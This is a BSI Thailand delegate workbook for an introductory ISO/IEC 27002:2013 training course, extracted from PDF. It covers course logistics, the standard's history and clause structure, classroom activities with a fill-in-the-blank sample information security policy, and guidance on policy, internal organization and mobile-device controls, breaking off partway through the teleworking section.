TRAINING COURSE
ISO/IEC 27002:2013 Information Security Controls
Introduction Training Course
สถาบ ันมาตรฐานอ ังกฤษ
บริษ ัท บีเอสไอ กรุป
๊ (ประเทศไทย) จําก ัด
Welc
come to
t BSI Trainin
T
ng.
Why train
n with us?
We unde
erstand that bus
siness success starts with peo
ople and
we’ve ass
sessed thousan
nds of business
ses, applying th
he same
standards
s to each, so
s
we can genuinely benchmark
performance. We have also trained many auditors w
who carry
e assessments
s and know we
w can take you
y
from
out these
beginner to certification to expert quick
kly – whereverr you are
earning journey
y, we can tailor training
t
to you a
and your
on your le
business.
earn Plus resou
urce
FREE Le
We recog
gnize that learning is a continu
ual process and
d doesn’t
just stop once
o
you’ve completed your trraining.
With this
s in mind, we offer FREE ad
dditional webin
nars and
eLearning
g resources on many of our co
ourses.
Look outt for our spec
cial icon that indicates your training
course co
omes with your FREE ‘Learn Plus’
P
resources.
They’ll be sent to you
u by email two
o months after you’ve
completed your training course.
Our apprroach
Within our training co
ourses we use
e accelerated learning
es to help you
u progress natu
urally and quic
ckly. We
technique
encourag
ge interaction and
a
collaboratiion because th
he more
involved you
y are, the mo
ore positive the outcome.
We also keep the courses varied an
nd put your lea
arning in
o give you an enjoyable, successful and ssatisfying
context to
experienc
ce.
Our tutorrs
Turn our experience into your expertis
se with industry
y leading
nals. Our tutors are recognized as leaders in th
heir field,
profession
offering a first-class learning experienc
ce. They are trrained to
understand and meet your different learning needs, and they
t
have
ndustry experiencce.
years of in
What’s more, our tutors train
n assessors who look at your organ
nization to
earning in line with
h your company’s accreditation.
a
keep your le
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
(Prerequisites reminder to delegates)
We recommend that you have a basic understanding of information security principles and
terminology.
We also recommend that you have an understanding of the information risks faced by their
organization.
A basic understanding of ISO/IEC 27001:2013, information technology and information risk
management may be an advantage.
Some delegates on this course will have already attended our Information Security Management
System (ISMS) Requirements of ISO 27001:2013, or Information Security Management System
(ISMS) Implementing ISO/IEC 27001:2013 course.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
1
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Please observe the following key points:
For your personal safety, please be aware of the emergency exits from your classroom and the
building.
The tutor will inform you of the nearest restrooms.
Please do not leave valuable items unattended in the classroom. Keep them with you or make other
arrangements for their safekeeping.
Please be considerate of other delegates, and avoid distractions from the beeping/flashing of your
mobile phone.
Please do not use recording devices since they may restrict free discussion.
The tutor will inform you of the lunch and break schedule. Please return to class on time.
The tutor will inform delegates of any area(s) known to be available for smoking.
If there are any special needs please confirm these now.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
2
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
By attending this BSI training course, you will become familiar with a typical framework for information
security that is intended to help an organization implement, maintain, and improve its information security
management. This knowledge should form a sound basis for your implementation efforts and significantly
benefit your organization.
This course is aimed at assisting you to understand the guidance provided within ISO/IEC 27002:2013 for
selecting controls when implementing an information security management system (ISMS) based on
ISI/IEC 27001 or implementing commonly accepted information security controls. Such controls will
enable your organization to comply with any applicable legislation and regulations and better protect
information.
You will personally benefit from being able to recognize where adjustments might need to be made to
protect information within your organization.
Your own knowledge will increase on the key concepts and requirements of ISO/IEC 27002:13 from an
implementation perspective, and you will also benefit from having the skills to conduct your own baseline
review of your organization’s current position with information security, and implement key concepts and
requirements relating to ISO/IEC 27001 and ISO/IEC 27002.
Your learning will be through an activity-based, delegate centred approach. This will help you share
experiences and knowledge with other attendees; bringing alive the information presented, resulting in
enhanced retention and application to your own workplace.
Our engaging, action-packed learning programmes are designed to transform the very culture of technical
training delivery. We inspire imagination through creation, not consumption.
By getting you involved from the start, you will develop your own knowledge and skills at a pace that suits
you. We use the most advanced teaching and learning method in use today. Based on the latest brain
research, our accelerated learning approach has proved again and again to increase learning effectiveness
while saving time and money in the process.
At BSI Training Academy, you have the full support and guidance of a world-class BSI tutor at your
disposal. We hope you enjoy the course and secure valuable knowledge and skills that you can
immediately apply within your workplace.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
3
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
The tutor will now explain the course aim.
ISO/IEC 27002 is the internationally recognized standard of good practice for information security
controls. ISO/IEC 27002’s lineage stretches back more than 30 year to the precursors of BS 7799.
ISO/IEC 27001 is a standard that provides the requirements for establishing, implementing,
maintaining and continually improving an information security management system (ISMS). In Annex
A, ISO/IEC 27001 provides details of best practice information security control objectives and controls
for organizations to consider. Implementation guidance for these information security controls is
provided in ISO/IEC 27002.
During this training, ISO/IEC 27002 control implementation guidance will be discussed and ISO/IEC2
27001 will be used as a reference tool, for context setting.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
4
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Your tutor(s) will introduce themselves.
Your turn:
Delegate name?
Organization and product or service?
Job position or role?
Experience of information security or risk management?
Based on your experience and observations in the workplace, what are your perceptions of the
risks associated with information security?
• Any specific questions/problems to be answered/expectations from the course?
• Something interesting about YOU?
•
•
•
•
•
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
5
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Learning objectives outline what delegates will know and be able to do by the end of the course.
On completion, successful delegates should gain the knowledge and skills outlined in this slide:
Knowledge
Delegates will be able to describe the background and purpose of ISO/IEC 27002 and will understand
its scope and structure. One of the main learning objectives of the course is for the delegates to gain
knowledge associated with each of the different best practice controls recommended by the standard
and the benefits of implementing them.
Skills
Delegates will be able to utilize their new understanding and knowledge to choose the most
appropriate controls for improving and maintaining information security and how to implement them
within their organizations whether as a standalone exercise or as part of implementing an information
security management system (ISMS) inline with ISO/IEC 27001.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
6
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
This course includes a detailed Delegate Workbook, practical activities and tutorial sessions.
The contents of the Delegate Workbook includes an agenda, slides and associated notes (like these),
activities, references and a toolkit.
Contents of the toolkit are also provided to you on a memory stick.
Please note: The contents of the toolkit are purely examples. BSI is not approving these
examples, or stating they conform to the requirements of the standard.
EXAMPLES ARE FOR REFERENCE PURPOSES ONLY.
Model answers to activities (contained in the References Section) are included for reference only after
attempting the activity, and not for copying from during the activities. The activities are designed to
increase understanding of the key learning points, and for delegates to look at the answers prior to
the activity will undermine this objective.
Delegates are encouraged to participate, experiment and question in a stress-free environment.
Any questions?
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
7
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
What is its purpose?
ISO/IEC 27002 is a code of practice - a universal, advisory document, not a formal specification such
as ISO/IEC 27001. It provides best practice recommendations on information security management
for use by those responsible for initiating, implementing or maintaining information security
management systems (ISMS).
Organizations that adopt ISO/IEC 27002 must assess their own information risks, clarify their control
objectives and apply suitable controls (or other forms of risk treatment) using the Standard for
guidance.
Where did it come from?
The ISO/IEC 27000 standards are descended from a corporate security standard donated by Shell to
a Department for Trade and Industry initiative in late 1989/early 1990. The Shell standard was
developed into British Standard BS 7799 in the mid-1990s, and was adopted as ISO/IEC 17799 in
2000. The ISO/IEC standard was revised in 2005, and renumbered ISO/IEC 27002 in 2007 to align
with the other ISO/IEC 27000 series standards. It was revised again in 2013.
Scope
Within the Code of Practice, there are a set of security fields, these contain 35 control objectives with
over 100 best-practice information security control measures recommended for organizations to
satisfy the control objectives and protect information assets against threats to confidentiality, integrity
and availability.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
8
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
The Standard is divided into 14 different security control clauses, namely:
•
•
•
•
•
•
•
•
•
•
•
•
•
•
Clause 5: Information security policies
Clause 6: Organization of information security
Clause 7: Human resources security
Clause 8: Asset management
Clause 9: Access control
Clause 10: Cryptography
Clause 11: Physical and environmental security
Clause 12: Operations security
Clause 13: Communications security
Clause 14: System acquisition, development and maintenance
Clause 15: Supplier relationships
Clause 16: Information security incident management
Clause 17: Information security aspects of business continuity management
Clause 18: Compliance
The order in which these clauses is presented is not significant and any other lists that exist within the
standard are not presented in any kind of priority order.
Organizations should determine which clauses and associated controls are important for them to
implement based on the benefit obtained by doing so. If using this standard as an aide for implementing
controls associated with an ISMS based on ISO/IEC 27001 then the management system requirement for
controls will be based on a risk management process.
Each of the clauses is split down further into 35 main security categories, each of which contains a control
objective. The controls recommended to meet the objective are listed beneath each of the main categories
and there are 114 controls in total.
For each control, ISO/IEC 27002 provides extensive ‘implementation guidance’ and for certain controls
‘other information’ which provides broader advice and considerations around that specific control.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
9
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Activity 1: Information security related terms and definitions
Purpose:
Familiarization with terms and definitions used in information security and ISO/IEC 27002.
Duration:
20 minutes in groups
10 minutes feedback and discussion
Directions:
In this activity, you will be split into groups by your tutor.
Each group will be provided with 2 sets of flashcards (terms and definitions). Each group is required
to pair the correct term to the definition.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
10
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
5.1 Management direction for information security
Objective: To provide management direction and support for information security in accordance with
business requirements and relevant laws and regulations.
5.1.1 Policies for information security
A set of policies for information security should be defined, approved by management, published and
communicated to employees and relevant external parties.
It is important that all persons working under the control of the organization and any interested third
parties are informed of the organization’s strategy for dealing with information security. To that end,
it is important for the organization to publish a high level information security policy document which
sets out the approach to managing the information security objectives it has defined. The information
security policy should be approved at the highest level of the organization (e.g. CEO or board level).
A number of things can influence the organization’s approach to managing its information security,
including:
• Business strategy
• Regulations, legislation and contracts
• The current and projected information security threat environment
Within the information security policy, there should be statements which include:
• A definition of information security, objectives and principles to guide all activities relating to
information security
• Assignment of general (e.g. users) and specific (e.g. information security manager, internal
auditor, CEO etc) responsibilities for information security management to defined roles
• Processes for handling deviations and exceptions (e.g. the use of a disciplinary process or a
specific process for handling exceptions to policy)
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
11
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
The information security policy should ideally be brief and concise, e.g. typically only be a few pages
long. In turn, it is supported by subject specific security policies which mandate the implementation
of more precise practices and controls. These supporting documents tend to be targeted at a
particular audience (e.g. technology experts, or departments) or cover a particular topic (e.g. access
control, cryptography).
It is important that all policies are communicated to those people who are required to comply with
them and this means not only employees and contractors but relevant third parties as well. They
should be communicated in such a way that makes them accessible and understandable. The content
of policies should be included in any information security awareness, education and training
programme that the organization implements.
5.1.2 Review of the policies for information security
The policies for information security should be reviewed at planned intervals or if significant changes
occur to ensure their continuing suitability, adequacy and effectiveness.
It is also important to ensure that policies are reviewed for accuracy and appropriateness on a
regular basis (e.g. annually) as well as in response to certain triggers such as changes to the
legislative, contractual or regulatory environment, changes to the threat landscape, changes in
technology, changes in business processes etc. Once reviewed and updated, the policies should be
reapproved for use.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
12
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Activity 2: Information security policy
Purpose: Identify missing elements in information security policy.
Duration:
15 minutes in pairs
15 minutes feedback
Directions:
In pairs, fill in the missing words (within the blank boxes) to complete the sample information
security policy over the page.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
13
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
SAMPLE INFORMATION SECURITY POLICY
1. Purpose
To define the policy requirements for information security within ABC Organization Ltd
2. Scope
Information takes many forms. The scope of this Information Security Policy includes, but is not
limited to:



All information processed by ABC Organization in pursuit of its operational activities, regardless
of whether it is processed electronically or in paper form, including but not limited to:
o External customer products, materials, information and reports
o Operational documents, plans, and minutes
o Financial and compliance records
o Employee records
All information processing facilities used in support of ABC Organization’s operational activities
to store, process and transmit information
All external organizations that provide services to ABC Organization in respect of information
processing facilities.
3. Definitions
Information security protects the following three attributes of ABC Organization’s information:
– Property that information is not made available or disclosed to
unauthorized individuals, entities, or processes

– Property of protecting the accuracy and completeness of assets

– Property of being accessible and usable upon demand by an
authorized entity
Other definitions applicable to this policy:

Employees – ABC Organization Ltd’s staff (permanent and temporary).
Information
value to ABC Organization Ltd.
Information
– Any information and information processing assets of
– An individual accountable for the information asset.
Information processing facilities – Any information processing system, service or infrastructure,
or the physical locations housing them.
4. Risks
Lack of information security can lead to
such as breach of
confidentiality, the corruption or unavailability of information which could affect ABC Organization’s
(and its customers’) financial results, compliance with
and
, reputation, and ability to trade.
Without defined and measurable
, it is not possible to determine whether ABC
Organization Ltd’s information security activities are effective and efficient.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
14
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
5. Objectives
The objective of this information security policy is to enable ABC Organization Ltd to effectively
manage its information security threats in order to support its business strategy and maintain its
legal, regulatory, internal and contractual compliance obligations.
ABC Organization Ltd’s security controls cover all threats, whether external or internal, deliberate or
.
Compliance with this information security policy is necessary to ensure business continuity, and
minimize business damage by preventing the occurrence, and minimizing the impact, of information
security incidents.
In support of this information security policy, the board of ABC Organization accepts its role in being
fully accountable for information security and are committed to:



Managing and reducing
Minimizing
occur
in an informed manner
on the organization when information security incidents
Ensure the organization has identified the legal requirements and they are complied with.
6.
ABC Organization’s Executive shall be accountable for ensuring that appropriate security and
compliance controls are identified, implemented and maintained by information owners. They shall be
supported in this task by the Information Security Forum (ISF).
The role and responsibility for managing information security at an operational level shall be
performed by the
. The
has
direct
responsibility to the ISF for maintaining this Information Security Policy, and providing advice and
guidance on its implementation.
Information owners within ABC Organization shall be responsible for the identification,
implementation and maintenance of controls that are commensurate with the
of
the
information assets they own and the risks to which they are exposed.
It is the responsibility of
this Information Security Policy.
to adhere to
Non-compliance of the Information Security Policy by any employee shall result in
7. Policy
7.1 Information security
This Information Security Policy provides that ABC Organization Ltd shall ensure that:



Information assets and information processing facilities shall be protected against unauthorized
access
Information shall be protected from unauthorised disclosure
Confidentiality of information assets shall be a high priority
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
15
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com











Integrity of information shall be maintained
ABC Organization Ltd requirements, as identified by information owners, for the availability of
information assets and information processing facilities required for operational activities shall
be met
Statutory, and expressed and implied legal obligations shall be met
Regulatory, contractual and internal compliance obligations shall be met
Requirements for the continuity of information security shall be determined and maintained
within ABC Organization Ltd’s
arrangements
Unauthorized use of information assets and information processing facilities shall be prohibited;
the use of obscene, racist or otherwise offensive statements shall be dealt with in accordance
with other policies published by ABC Organization Ltd
This information security policy shall be communicated to all employees for whom information
security
shall be given
A systematic approach to information security
shall be followed and shall be a dynamic and continual process
Information security shall be managed through a formal Information Security Management
System (ISMS that shall be defined within a documented framework
All breaches of information security, actual or suspected, shall be reported and investigated in
line with ABC Organization Ltd’s published policies
Controls shall be commensurate with the risks faced by ABC Organization Ltd
In support of this information security policy, more detailed operational security policies and
processes shall be developed for employees, information assets and information processing facilities.
These policies shall be
at planned intervals or if significant changes occur
to ensure their continuing suitability, adequacy and effectiveness.
7.2 Deviations and exceptions
Any deviations from this policy must be authorized by ABC Organization Ltd’s ISF. Exceptions and
deviations shall be managed through ABC Organization Ltd’s incident management or change
management processes.
8. Key performance measures
Information security objectives shall be agreed on an annual basis, supported by a set of key
performance indicators (KPIs), with milestones and targets. These measures shall be reported to the
ISF for review.
9. Review and maintenance
This information security policy shall be reviewed
ISM02101ENGX v2.0 Nov 2017
by the
to ensure it remains fit for purpose.
Copyright © 2017 BSI. All rights reserved.
16
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
10. References



ISO/IEC 27000:2013 Information technology – Security techniques – Information security
management systems – Overview and vocabulary (ISO 27000)
BS ISO/IEC 27001:2013 Information technology – Security techniques – Information security
management systems – Requirements (ISO 27001)
BS ISO/IEC 27002:2013 Information technology – Security techniques – Code of practice for
information security controls (ISO 27002)
11. Change history
Issue1
27 August 2017
- First published
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
17
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
6.1 Internal organization
Objective: To establish a management framework to initiate and control the implementation and
operation of information security within the organization.
6.1.1 Information security roles and responsibilities
All information security responsibilities should be defined and allocated.
It is important to ensure that roles and responsibilities within the organization are defined where
those roles have the ability to affect information security. In general, this is likely to be split into three
types of roles;
• Group roles such as those performed by committees and forums, e.g. information security forum
or risk and audit committee
• Specific roles as performed by an individual, e.g. information security manager, or individuals with
the same role, e.g. database managers, network support analysts etc.
• General roles such as users, customers etc.
Once the roles are defined, they are likely to be published in the Information Security Policy so that
everyone is aware of the information security responsibilities throughout the organization.
6.1.2 Segregation of duties
Conflicting duties and areas of responsibility should be segregated to reduce opportunities for
unauthorized or unintentional modification or misuse of the organization’s assets.
One of the traditional business areas/functions where segregation of duties can be found is within
finance where it is considered best practice for no single person to be able to; add a new supplier to
the system, raise a purchase order for that supplier, authorize the purchase order, process and
invoice and authorize payment. If one individual has all of these capabilities then the conditions exist
for fraud to occur. We sometimes find that in certain organizations, privileges are given to individuals
without thought being given to the
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
18
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
consequences of potentially conflicting duties or where there is the opportunity for unauthorized or
unintentional modification or misuse of the organization’s information assets. As such, organizations need
to take care when no individual can access, modify or use assets without authorization or detection.
Naturally, segregation can be more challenging in smaller organizations and this is where other
compensating controls, such as auditing and monitoring, need to be considered.
One area where segregation of duties is important is in software development. No single individual should
be able to write code within the development environment and then go on to authorize its release into
production. If this situation exists then the likelihood of back doors and trapdoors and other malicious
software could more easily find its way into the live environment.
6.1.3 Contact with authorities
Appropriate contacts with relevant authorities should be maintained.
As part of the roles defined within the organization (as discussed in 6.1.1) consideration should be given to
who is authorized to make contact with different authorities and under what conditions. These authorities
can vary in nature and can include blue light emergency services (fire, ambulance, police etc.), health
authorities, government bodies, landlords, facilities companies (gas, water, electricity etc.), regulators, etc.
It is particularly important that there are clear guidelines in place in the event of reporting information
security incidents if it is suspected that laws have been broken or the organization is under some form of
cyber attack.
6.1.4 Contact with special interest groups
Appropriate contacts with special interest groups or other specialist security forums and professional
associations should be maintained.
In order to keep abreast of emerging information security threats it is essential that specific individuals
within the organization keep their specialist knowledge up to date in order to continue to perform their
duties effectively and protect information. For example a Windows engineer will need to be aware of the
latest information on the Windows operating systems and the latest available patches etc. Keeping up to
date with the latest developments can be achieved through the use of email bulletin subscription services,
the use of forums and through networking. Organizations should be encouraging individuals to join and
participate in special interest groups.
6.1.5 Information security in project management
Information security should be addressed in project management, regardless of the type of the project.
Many project management frameworks have inbuilt risk management functions which enable project
managers to identify and mitigate risks to the project that could undermine its success. Organizations
should also ensure that such frameworks and methodologies also include the opportunity for project
managers to identify the potential impacts on information (from a confidentiality, integrity and availability
perspective), that projects may pose. For example if the project introduces a new information asset, it
should also identify the requirements for confidentiality (does the data need to be encrypted for example),
integrity (what controls should be built into the system to prevent erroneous data input for example) and
availability (what requirements are there for backups and how does this affect the current backup schedule
for example). All of these considerations will add to the cost and potentially the timeline of the project
delivery and so need to be identified as soon as possible within the process.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
19
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
6.2 Mobile devices and teleworking
Objective: To ensure the security of teleworking and use of mobile devices
6.2.1 Mobile device policy
A policy and supporting security measures should be adopted to manage the risks introduced by using
mobile devices.
Mobile computing offers significant benefits in productivity. It also introduces a range of risks to
information security.
Organizations need to be aware of the likelihood of information assets being transported outside the
confines of the office environment, to client sites, home and public spaces. Risk assessments need to
be conducted in order to the full extent of risks associated with mobile computing and should define a
set of rules and guidelines to ensure control over the security of information is maintained. These rules
should be documented in a mobile device policy that is published and communicated to all users to
ensure that they all understand what the rules are.
Users may be required to sign an end user agreement before mobile access to business information is
provided. These rules should include what information is allowed to be stored and communicated using
mobile devices and what information is not. These rules will go hand in hand with the requirements
defined in any classification policy and associated handling guidelines. Not only should the rules state
what information can be stored or processed on mobile devices but also what mobile devices are
allowed to be used. For example, is it acceptable for users to use their own computing devices (BYOD),
and smartphones (whether company or personally owned). Are USB storage devices allowed and if so,
what are the rules around how they should be used? Mobile users need to be aware of the security
precautions and measures they need to followed e.g. using cryptographic techniques, never leaving
devices unattended, using Kensington locks, and separating private from business use etc.
Consideration will also need to be given to the almost inevitable scenario of a device being lost or
stolen, taking into account legal, insurance and other security requirements. Mobile users need to be
clear what actions need to be taken and when. Equally the organization needs to
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
20
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
consider measures such as being able to remotely wipe the device, thus protecting the information
that may be stored on it. The resulting decisions from these considerations need to be clearly
documented and communicated with regular training provided to the relevant individuals.
6.2.2 Teleworking
A policy and supporting security measures should be implemented to protect information accessed,
processed or stored at teleworking sites.
As stated in 6.2.1 many organizations have a mobile workforce, but consideration should not only be
